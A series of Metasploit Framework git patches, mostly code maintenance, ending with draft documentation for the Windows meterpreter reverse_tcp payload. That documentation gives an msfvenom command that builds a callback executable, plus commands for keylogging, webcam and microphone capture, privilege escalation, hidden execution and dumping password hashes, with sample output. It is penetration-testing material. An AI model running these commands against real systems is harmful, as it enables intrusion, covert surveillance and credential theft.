ObjectSpace.define_finalizer(self, self.class.finalize(client, hkey)) end - def self.finalize(client,hkey) - proc { self.close(client,hkey) } + def self.finalize(client, hkey) + proc { self.close(client, hkey) } end ## @@ -113,8 +114,12 @@ class RemoteRegistryKey end # Instance method for the same - def close() - self.class.close(self.client, self.hkey) + def close + unless self.hkey.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.hkey) + self.hkey = nil + end end ## diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb index 43481cdc8f..4469a1e633 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb @@ -34,7 +34,9 @@ class Thread < Rex::Post::Thread self.process = process self.handle = handle self.tid = tid - ObjectSpace.define_finalizer( self, self.class.finalize(self.process.client, self.handle) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(process.client, handle)) end def self.finalize(client,handle) @@ -168,7 +170,11 @@ class Thread < Rex::Post::Thread # Instance method def close - self.class.close(self.process.client, self.handle) + unless self.handle.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.process.client, self.handle) + self.handle = nil + end end attr_reader :process, :handle, :tid # :nodoc: From 934f8de9b786e3f80af1256cbc9ff4302a02d572 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 3 Mar 2016 00:53:00 -0600 Subject: [PATCH 472/686] Update the conditions of is_remote_exploit? --- lib/msf/util/document_generator/normalizer.rb | 22 +++++++++++++++---- 1 file changed, 18 insertions(+), 4 deletions(-) diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 31c0f9b4c5..ed1477c881 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -219,6 +219,23 @@ module Msf end + # Returns whether the module is a remote exploit or not. + # + # @param mod [Msf::Module] Metasploit module. + # @return [TrueClass] Module is a remote exploit. + # @return [FalseClass] Module is not really a remote exploit. + def is_remote_exploit?(mod) + # It's actually a little tricky to determine this, so we'll try to be as + # specific as possible. Rather have false negatives than false positives, + # because the worst case would be using the generic demo template. + mod.type == 'exploit' && # Must be an exploit + mod.kind_of?(Msf::Exploit::Remote) && # Should always have this + !mod.kind_of?(Msf::Exploit::FILEFORMAT) && # Definitely not a file format + !mod.kind_of?(Msf::Exploit::Remote::TcpServer) && # If there is a server mixin, things might get complicated + mod.options['DisablePayloadHandler'] # Must allow this option + end + + # Returns a demo template suitable for the module. Currently supported templates: # BrowserExploitServer modules, HttpServer modules, local exploit modules, post # modules, payloads, auxiliary scanner modules. @@ -238,10 +255,7 @@ module Msf load_template(mod, PAYLOAD_TEMPLATE) elsif mod.kind_of?(Msf::Auxiliary::Scanner) load_template(mod, AUXILIARY_SCANNER_TEMPLATE) - elsif mod.type == 'exploit' && - !mod.kind_of?(Msf::Exploit::FILEFORMAT) && - mod.kind_of?(Msf::Exploit::Remote) && - mod.options['DisablePayloadHandler'] + elsif is_remote_exploit?(mod) load_template(mod, REMOTE_EXPLOIT_DEMO_TEMPLATE) else load_template(mod, GENERIC_DEMO_TEMPLATE) From cececa749dada2d090ef7698cca21531c0587066 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 3 Mar 2016 00:58:17 -0600 Subject: [PATCH 473/686] Update css --- data/markdown_doc/markdown.css | 18 +++--------------- 1 file changed, 3 insertions(+), 15 deletions(-) diff --git a/data/markdown_doc/markdown.css b/data/markdown_doc/markdown.css index 034ba8cca5..56e5948b78 100644 --- a/data/markdown_doc/markdown.css +++ b/data/markdown_doc/markdown.css @@ -1,11 +1,4 @@ -h1, -h2, -h3, -h4, -h5, -h6, -p, -blockquote { +h1, h2, h3, h4, h5, h6, p, blockquote { margin: 0; padding: 0; } @@ -29,12 +22,7 @@ a img { p { margin-bottom: 16px; } -h1, -h2, -h3, -h4, -h5, -h6 { +h1, h2, h3, h4, h5, h6 { color: #404040; line-height: 36px; } @@ -91,7 +79,7 @@ code, pre { font-family: Monaco, Andale Mono, Courier New, monospace; } code { - background-color: #fee9cc; + background-color: #eee; color: rgba(0, 0, 0, 0.75); padding: 1px 3px; font-size: 13px; From f4866fd5f03176edef03f20c25cd7de1c7b33c62 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 3 Mar 2016 01:27:14 -0600 Subject: [PATCH 474/686] Update template and web_delivery doc --- data/markdown_doc/remote_exploit_demo_template.erb | 6 +++++- documentation/modules/exploit/multi/script/web_delivery.md | 7 ++++--- 2 files changed, 9 insertions(+), 4 deletions(-) diff --git a/data/markdown_doc/remote_exploit_demo_template.erb b/data/markdown_doc/remote_exploit_demo_template.erb index 53238e7725..ea72c5480f 100644 --- a/data/markdown_doc/remote_exploit_demo_template.erb +++ b/data/markdown_doc/remote_exploit_demo_template.erb @@ -1,3 +1,5 @@ +**Using <%= mod.shortname %> against a single host** + Normally, you can use <%= mod.fullname %> this way: ``` @@ -10,7 +12,9 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options msf <%= mod.type %>(<%= mod.shortname %>) > exploit ``` -But since this is a remote exploit module, you can also engage multiple hosts. +**Using <%= mod.shortname %> against multiple hosts** + +But it looks like this is a remote exploit module, which means you can also engage multiple hosts. First, create a list of IPs you wish to exploit with this module. One IP per line. diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md index 3694fc16c4..f5208585ee 100644 --- a/documentation/modules/exploit/multi/script/web_delivery.md +++ b/documentation/modules/exploit/multi/script/web_delivery.md @@ -11,7 +11,7 @@ say the target supports Powershell. ## Verification Steps -To be able to use web_delivery, you must gain access to the target machine first, wit the ability +To be able to use web_delivery, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter. At that point, you would use web_delivery similar to the following example: @@ -56,7 +56,8 @@ PHP is a fairly popular language for web servers, especially Apache. **Powershell/win** Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 -are the first Windows versions to come with Powershell by default, and not older systems. +are the first Windows versions to come with Powershell by default. Older Windows systems such as XP +don't come with it by default, but it is still possible to see it installed on a corporate network. ## Scenarios @@ -67,7 +68,7 @@ web_delivery would work nicely for a web application with a command execution vu One way to approach this would be: 1. Start exploit/multi/script/web_delivery -2. Use Burp Suite to intercept the HTTP/HTTPS request, place the command in the parameter that +2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution. 3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session. From ba4e0d304be432934158a08798573b49d5a17492 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 3 Mar 2016 11:05:16 -0600 Subject: [PATCH 475/686] Do regex \d+ instead --- modules/exploits/multi/http/atutor_sqli.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index b7ed10fdde..fb6be15379 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -243,7 +243,7 @@ class Metasploit3 < Msf::Exploit::Remote mid = (lower + upper) / 2 sqli = "#{sql}>#{mid}" result = perform_request(sqli, cookie) - if result =~ /There are \d{0,8} entries\./ + if result =~ /There are \d+ entries\./ lower = mid + 1 else upper = mid @@ -254,7 +254,7 @@ class Metasploit3 < Msf::Exploit::Remote else sqli = "#{sql}=#{lower}" result = perform_request(sqli, cookie) - if result =~ /There are \d{0,8} entries\./ + if result =~ /There are \d+ entries\./ value = lower end end @@ -265,12 +265,12 @@ class Metasploit3 < Msf::Exploit::Remote if do_test if do_true result = perform_request("1=1", cookie) - if result =~ /There are \d{0,8} entries\./ + if result =~ /There are \d+ entries\./ return true end else not do_true result = perform_request("1=2", cookie) - if not result =~ /There are \d{0,8} entries\./ + if not result =~ /There are \d+ entries\./ return true end end From b7fe5007887d65bc1d2df3d0cecbfb590eef0e98 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Fri, 4 Mar 2016 11:56:23 +0000 Subject: [PATCH 476/686] sqlite_read -> sqlite_query --- .../meterpreter/extensions/android/android.rb | 4 +-- .../ui/console/command_dispatcher/android.rb | 25 ++++++++----------- 2 files changed, 12 insertions(+), 17 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index e8d1bd7192..2d20c883c7 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -284,8 +284,8 @@ class Android < Extension networks end - def sqlite_read(dbname, query) - request = Packet.create_request('sqlite_read') + def sqlite_query(dbname, query) + request = Packet.create_request('sqlite_query') request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) response = client.send_request(request, 30) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 70539bb60e..737de766cd 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -31,7 +31,7 @@ class Console::CommandDispatcher::Android 'wlan_geolocate' => 'Get current lat-long using WLAN information', 'interval_collect' => 'Manage interval collection capabilities', 'activity_start' => 'Start an Android activity from a Uri string', - 'sqlite_read' => 'Query a SQLite database from storage' + 'sqlite_query' => 'Query a SQLite database from storage' } reqs = { @@ -45,7 +45,7 @@ class Console::CommandDispatcher::Android 'wlan_geolocate' => ['wlan_geolocate'], 'interval_collect' => ['interval_collect'], 'activity_start' => ['activity_start'], - 'sqlite_read' => ['sqlite_read'], + 'sqlite_query' => ['sqlite_query'], } # Ensure any requirements of the command are met @@ -548,13 +548,8 @@ class Console::CommandDispatcher::Android end end - def cmd_sqlite_write(*args) - results = client.android.sqlite_write("SELECT 1") - p results - end - - def cmd_sqlite_read(*args) - sqlite_read_opts = Rex::Parser::Arguments.new( + def cmd_sqlite_query(*args) + sqlite_query_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], '-d' => [ true, 'The sqlite database file'], '-q' => [ true, 'The sqlite statement to execute'] @@ -562,11 +557,11 @@ class Console::CommandDispatcher::Android database = '' query = '' - sqlite_read_opts.parse(args) do |opt, _idx, val| + sqlite_query_opts.parse(args) do |opt, _idx, val| case opt when '-h' - print_line("Usage: sqlite_read -d <database_file> -q <statement>\n") - print_line(sqlite_read_opts.usage) + print_line("Usage: sqlite_query -d <database_file> -q <statement>\n") + print_line(sqlite_query_opts.usage) return when '-d' database = val @@ -577,12 +572,12 @@ class Console::CommandDispatcher::Android if database.blank? || query.blank? print_error("You must enter both a database files and a query") - print_error("e.g. sqlite_read -d /sdcard/Download/webviewCookiesChromium.db -q 'SELECT * from cookies'") - print_line(sqlite_read_opts.usage) + print_error("e.g. sqlite_query -d /sdcard/Download/webviewCookiesChromium.db -q 'SELECT * from cookies'") + print_line(sqlite_query_opts.usage) return end - result = client.android.sqlite_read(database, query) + result = client.android.sqlite_query(database, query) header = "#{query} on database file #{database}" table = Rex::Ui::Text::Table.new( 'Header' => header, From 2cfc9073a08bcf2102648a7693faae19a7070812 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Fri, 4 Mar 2016 11:56:37 +0000 Subject: [PATCH 477/686] fixup sqlite_query --- .../meterpreter/extensions/android/android.rb | 28 +++++++++-------- .../meterpreter/extensions/android/tlv.rb | 2 ++ .../ui/console/command_dispatcher/android.rb | 30 +++++++++++-------- 3 files changed, 36 insertions(+), 24 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 2d20c883c7..b1b21895ae 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -284,24 +284,28 @@ class Android < Extension networks end - def sqlite_query(dbname, query) + def sqlite_query(dbname, query, writeable) request = Packet.create_request('sqlite_query') request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) + request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable) response = client.send_request(request, 30) + error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR) + raise "SQLiteException: #{error_msg.value}" if error_msg - result = { - columns: [], - rows: [] - } - data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP) - columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) - result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) - data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| - result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + unless writeable + result = { + columns: [], + rows: [] + } + data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP) + columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) + result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| + result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + end + result end - - result end end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index d88467fd73..c4573f0d7d 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -86,6 +86,8 @@ TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083) TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084) TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085) +TLV_TYPE_SQLITE_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9086) +TLV_TYPE_SQLITE_WRITE = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9087) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 737de766cd..9bcd0f8683 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -552,9 +552,11 @@ class Console::CommandDispatcher::Android sqlite_query_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], '-d' => [ true, 'The sqlite database file'], - '-q' => [ true, 'The sqlite statement to execute'] + '-q' => [ true, 'The sqlite statement to execute'], + '-w' => [ false, 'Open the database in writable mode (for INSERT/UPDATE statements)'] ) + writeable = false database = '' query = '' sqlite_query_opts.parse(args) do |opt, _idx, val| @@ -567,6 +569,8 @@ class Console::CommandDispatcher::Android database = val when '-q' query = val + when '-w' + writeable = true end end @@ -577,18 +581,20 @@ class Console::CommandDispatcher::Android return end - result = client.android.sqlite_query(database, query) - header = "#{query} on database file #{database}" - table = Rex::Ui::Text::Table.new( - 'Header' => header, - 'Columns' => result[:columns], - 'Indent' => 0 - ) - result[:rows].each do |e| - table << e + result = client.android.sqlite_query(database, query, writeable) + unless writeable + header = "#{query} on database file #{database}" + table = Rex::Ui::Text::Table.new( + 'Header' => header, + 'Columns' => result[:columns], + 'Indent' => 0 + ) + result[:rows].each do |e| + table << e + end + print_line + print_line(table.to_s) end - print_line - print_line(table.to_s) end # From dcba20ff60a5f6d988b54d5646438735452aeb2a Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Fri, 4 Mar 2016 12:08:19 -0600 Subject: [PATCH 478/686] only cleanup processes once too --- .../meterpreter/extensions/stdapi/sys/process.rb | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb index 92f77b3567..31cc02e7ff 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb @@ -285,11 +285,12 @@ class Process < Rex::Post::Process 'thread' => Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread.new(self), }) - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.handle) ) + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, handle)) end - def self.finalize(client,handle) - proc { self.close(client,handle) } + def self.finalize(client, handle) + proc { self.close(client, handle) } end # @@ -320,8 +321,12 @@ class Process < Rex::Post::Process # # Instance method # - def close(handle=self.handle) - self.class.close(self.client, handle) + def close(handle = self.handle) + unless self.pid.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, handle) + self.pid = nil + end end # From ce675330c06efb109fd1910e5e86959a5c62c84f Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Fri, 4 Mar 2016 14:49:55 -0800 Subject: [PATCH 479/686] Bump version of framework to 4.11.14 --- Gemfile.lock | 5 ++++- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 04f1875f8e..1a1e3d300e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.13) + metasploit-framework (4.11.14) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) @@ -246,3 +246,6 @@ DEPENDENCIES simplecov timecop yard + +BUNDLED WITH + 1.11.2 diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 37ce83291f..47b58a2d4c 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.13" + VERSION = "4.11.14" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From a5cdd7e17f8a631ec0f24d10d7755761453e56c4 Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Fri, 4 Mar 2016 16:56:02 -0800 Subject: [PATCH 480/686] Bump version of framework to 4.11.15 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 1a1e3d300e..f23156b5a5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.14) + metasploit-framework (4.11.15) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 47b58a2d4c..291b3563ec 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.14" + VERSION = "4.11.15" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From c811ed8d6063114dd295a703bb0810387416556a Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sat, 5 Mar 2016 00:42:36 -0600 Subject: [PATCH 481/686] Correct name: PAYLOAD_DEMO_TEMPLATE --- lib/msf/util/document_generator/normalizer.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index ed1477c881..02a11c9544 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -252,7 +252,7 @@ module Msf elsif mod.kind_of?(Msf::Post) load_template(mod, POST_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Payload) - load_template(mod, PAYLOAD_TEMPLATE) + load_template(mod, PAYLOAD_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Auxiliary::Scanner) load_template(mod, AUXILIARY_SCANNER_TEMPLATE) elsif is_remote_exploit?(mod) From 1b39d5f593f54f89b3b1a7fd9d2171a9bfcd9dd8 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sat, 5 Mar 2016 00:43:08 -0600 Subject: [PATCH 482/686] Add work in progress: windows/meterpreter/reverse_tcp.md --- .../windows/meterpreter/reverse_tcp.md | 591 ++++++++++++++++++ 1 file changed, 591 insertions(+) create mode 100644 documentation/modules/payload/windows/meterpreter/reverse_tcp.md diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md new file mode 100644 index 0000000000..b9693cfb0f --- /dev/null +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -0,0 +1,591 @@ +windows/meterpreter/reverse_tcp is one of the most powerful features the Metasploit Framework has +to offer, and there's so many things you can do with it. + +It allows you to remotely control the file system, sniff, keylog, hashdump, network pivoting, +control the webcam and microphone, etc. It has the best support for post modules, and you can +load extensions such as mimikatz and python interpreter, etc. + +windows/meterpreter/reverse_tcp is also the default payload for all Windows exploit targets. + +## Vulnerable Application + +This meterpreter payload is suitable for the following environments: + +* Windows x64 +* Windows x86 + +## Verification Steps + +windows/meterpreter/reverse_tcp is typically used in two different ways. + +First, it is typically used as a payload for an exploit. Here's how to do that: + +1. In msfconsole, select an exploit module +2. Configure the options for that exploit. +3. Do: ```set payload windows/meterpreter/reverse_tcp``` +4. Set the ```LHOST``` option, which is the IP that the payload should connect to. +5. Do: ```exploit```. If the exploit is successful, it should execute that payload. + +Another way to use windows/meterpreter/reverse_tcp is to generate it as an executable. Normally, +you would want to do it with msfvenom. If you are old school, you have probably also heard of +msfpayload and msfencode: msfvenom is a replacement of those. + +The following is a basic example of using msfvenom to to generate windows/meterpreter/reverse_tcp +as an executable: + +``` +./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o /tmp/payload.exe +``` + +## Important Basic Commands + +**pwd command** + +The ```pwd``` command allows you to see the current directory you're in on the remote target. +Example: + +``` +meterpreter > pwd +C:\Users\user\Desktop +``` + +**cd command** + +The ```cd``` command allows you to change directory. Example: + +``` +meterpreter > cd C:\\ +meterpreter > pwd +C:\ +``` + +**cat command** + +The ```cat``` command allows you to see the content of a file: + +``` +meterpreter > cat C:\\file.txt +Hello world! +``` + +**upload command** + +The ```upload``` command allows you to upload a file to the remote target. For example: + +``` +meterpreter > upload /tmp/something.txt C:\\Users\\user\\Desktop\\something.txt +[*] uploading : /tmp/something.txt -> C:\Users\user\Desktop\something.txt +[*] uploaded : /tmp/something.txt -> C:\Users\user\Desktop\something.txt +meterpreter > +``` + +The ```-r``` option for the command also allows you to upload recursively. + +**download command** + +The ```download``` command allows you download a file from the remote target to your machine. +For example: + +``` +meterpreter > download C:\\Users\\user\\Desktop\\something.txt /tmp/ +[*] downloading: C:\Users\user\Desktop\something.txt -> /tmp//something.txt +[*] download : C:\Users\user\Desktop\something.txt -> /tmp//something.txt +meterpreter > +``` + +The ```-r``` option for the command also allows you to download recursively. + +**search command** + +The ```search``` command allows you to find files on the remote file system. For example, this +demonstrates how to find all text files in the current directory: + +``` +meterpreter > search -d . -f *.txt +Found 1 result... + .\something.txt (5 bytes) +``` + +Note that without the ```-d``` option, the command will attempt to search in all drives. + +The ```-r``` option for the commands allows you to search recursively. + +**ifconfig command** + +The ```ifconfig``` command displays the network interfaces on the remote machine: + +``` +meterpreter > ifconfig + +Interface 1 +============ +Name : Software Loopback Interface 1 +Hardware MAC : 00:00:00:00:00:00 +MTU : 4294967295 +IPv4 Address : 127.0.0.1 +IPv4 Netmask : 255.0.0.0 +IPv6 Address : ::1 +IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +... +``` + +The command ```ipconfig``` is an alias for ```ifconfig```. + +**getuid command** + +The ```getuid``` command shows you the current user that the payload is running as: + +``` +meterpreter > getuid +Server username: WIN-6NH0Q8CJQVM\user +``` + +**execute command** + +The ```execute``` command allows you to execute a command or file on the remote machine. + +The following example will spawn a calculator: + +``` +meterpreter > execute -f calc.exe +Process 2076 created. +``` + +To pass an argument, use the ```-a``` flag: + +``` +meterpreter > execute -f iexplore.exe -a http://metasploit.com +Process 2016 created. +``` + +There are some options you can see to add more stealth. For example, you can use the ```-H``` flag +to create the process hidden from view. You can also use the ```-m``` flag to execute from memory. + +**ps command** + +The ```ps``` command lists the running processes on the remote machine. + +**shell command** + +The ```shell``` command allows you to interact with the remote machine's command prompt. Example: + +``` +meterpreter > shell +Process 3576 created. +Channel 6 created. +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\user\Desktop> +``` + +To switch back to meterpreter, do [CTRL]+[Z] to background the channel. + +**sysinfo command** + +The ```sysinfo``` command shows you basic information about the remote machine. Example: + +``` +meterpreter > sysinfo +Computer : WIN-6NH0Q8CJQVM +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x86 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/win32 +meterpreter > +``` + +**keyscan_start** + +The ```keyscan_start`` command starts the keylogging feature on the remote machine. + +**keyscan_dump** + +The ```keyscan_dump``` command is a keylogger feature. You must use the ```keyscan_start``` command +before using this. Example: + +``` +meterpreter > keyscan_start +Starting the keystroke sniffer... +meterpreter > keyscan_dump +Dumping captured keystrokes... +Hello World!! +``` + +If you wish to stop sniffing, use the ```keyscan_stop``` command. + +**keyscan_stop** + +The ```keyscan_stop``` command stops the keylogger. + +**screenshot** + +The ```screenshot``` command takes a screenshot of the target machine. + +**webcam_list** + +The ```webcam_list``` commands shows you a list of webcams that can be controlled by you. You +probably want to use this first before using any other webcam commands. + +**webcam_snap** + +The ```webcam_snap``` commands uses the selected webcam to take a picture. + +**webcam_stream** + +The ```webcam_stream``` command basically uses the ```webcam_snap``` command repeatedly to create +the streaming effect. There is no sound. + +**record_mic** + +The ```record_mic``` command captures audio on the remote machine. + +**getsystem** + +The ```getsystem``` command attempts to elevate your privilege on the remote machine with one of +these techniques: + +* Named pipe impersonation (in memory) +* Named pipe impersonation (dropper) +* Token duplication (in memory) + +Example: + +``` +meterpreter > getsystem +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +``` + +**hashdump** + +The ```hashdump``` commands allows you to dump the Windows hashes if there's enough privilege. +Example: + +``` +meterpreter > hashdump +Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f::: +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +HelpAssistant:1000:92a84e332fa4b09e9850257ad6826566:8fb9a6e155fd6e14a16c37427b68bbb4::: +root:1003:633c097a37b26c0caad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d::: +SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:e09fcdea29d93203c925b205640421f2::: +``` + + +## Scenarios + +**Setting up for Testing** + +For testing purposes, if you're tired of manually generating a payload and starting a multi handler +repeatedly, the auto_win32_multihandler.rc resource script in Metasploit automates that. Here's how +you would use it: + +First, run the resource script: + +``` +$ ./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc +[*] Processing scripts/resource/auto_win32_multihandler.rc for ERB directives. +[*] resource (scripts/resource/auto_win32_multihandler.rc)> Ruby Code (776 bytes) +lhost => 192.168.1.199 +lport => 4444 +[*] Writing 73802 bytes to /Users/metasploit/.msf4/local/meterpreter_reverse_tcp.exe... +[*] windows/meterpreter/reverse_tcp's LHOST=192.168.1.199, LPORT=4444 +[*] windows/meterpreter/reverse_tcp is at /Users/metasploit/.msf4/local/meterpreter_reverse_tcp.exe +payload => windows/meterpreter/reverse_tcp +lhost => 192.168.1.199 +lport => 4444 +exitonsession => false +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 192.168.1.199:4444 +[*] Starting the payload handler... +msf exploit(handler) > +``` + +Next, go to your ~/.msf4/local directory, you should see meterpreter_reverse_tcp.exe in there. +Upload that payload to your test box, execute it, and you should receive a connection. + + +**Antivirus Evasion** + +.. + +**Using the Mimikatz Extension** + +.. + +**Using the extapi Extension** + +.. + +**Using the Python Extension** + +The Python extension allows you to use the remote machine's Python interpreter. + +To load the extension, at the meterpreter prompt, do: + +``` +meterpreter > use python +Loading extension python...success. +``` + +The most basic example of using the interpreter is the ```python_execute``` command: + +``` +meterpreter > python_execute "x = 'hello world'; print x" +[+] Content written to stdout: +hello world + +meterpreter > +``` + +Another way to execute Python code is from a local file by using the ```python_import``` command. + +To do this, first prepare for a Python script. This example should create a message.txt on the +remote machine's desktop: + + +```python +import os + +user_profile = os.environ['USERPROFILE'] + +f = open(user_profile + '\\Desktop\\message.txt', 'w+') +f.write('hello world!') +f.close() +``` + +And to run that with the command: + +``` +meterpreter > python_import -f /tmp/test.py +[*] Importing /tmp/test.py ... +[+] Command executed without returning a result +meterpreter > +``` + +To learn more about the Python 